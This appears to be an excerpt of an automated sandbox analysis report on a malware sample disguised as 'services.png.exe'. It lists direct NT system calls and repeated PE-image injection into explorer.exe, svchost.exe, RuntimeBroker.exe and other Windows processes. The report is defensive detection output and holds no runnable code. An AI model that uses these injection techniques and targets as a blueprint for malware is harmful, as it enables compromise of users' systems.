Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtSetValueKey: Direct from: 0x76F0309C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtSetTimerEx: Direct from: 0x76F0458C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtWriteFile: Direct from: 0x76F02AFC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtEnumerateKey: Direct from: 0x76F02DBC
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtSetSecurityObject: Direct from: 0x76F0450C
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	NtQueryInformationProcess: Direct from: 0x76F02C26

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\services.png.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 2960000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\sihost.exe base: AC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: 910000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: 9A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\ctfmon.exe base: A50000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\explorer.exe base: C350000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: D40000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 110000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: AB0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 290000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 3D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 900000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 180000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 190000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\svchost.exe base: FB0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\dllhost.exe base: AC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\conhost.exe base: 30000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: E20000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 810000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: EE0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2990000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E30000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2530000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E50000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CA0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C90000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F50000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B30000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2390000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C90000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1640000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2310000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A50000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2720000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2460000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2740000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EA0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2AC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D00000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2AC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3190000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2A40000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 390000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C60000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2970000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2B20000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 27E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2210000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2880000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 11E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: DA0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 790000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2580000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C40000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2F10000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 700000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C70000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2610000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 6D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1130000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 9D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: B90000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: C10000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 790000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 390000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D20000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2510000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2550000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2460000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29F0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2090000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C90000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26A0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E00000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2280000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3090000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: FE0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2980000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EC0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2DF0000 value starts with: 4D5A	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: PID: 2580 base: C350000 value: 4D	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: PID: 2580 base: C391778 value: 00	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: PID: 2580 base: C39178C value: 00	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: PID: 2580 base: C391BF0 value: D8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Memory written: PID: 2580 base: C391BF4 value: AC	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\services.png.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 2960000	Jump to behavior
Source: C:\Users\user\Desktop\services.png.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 29A1778	Jump to behavior
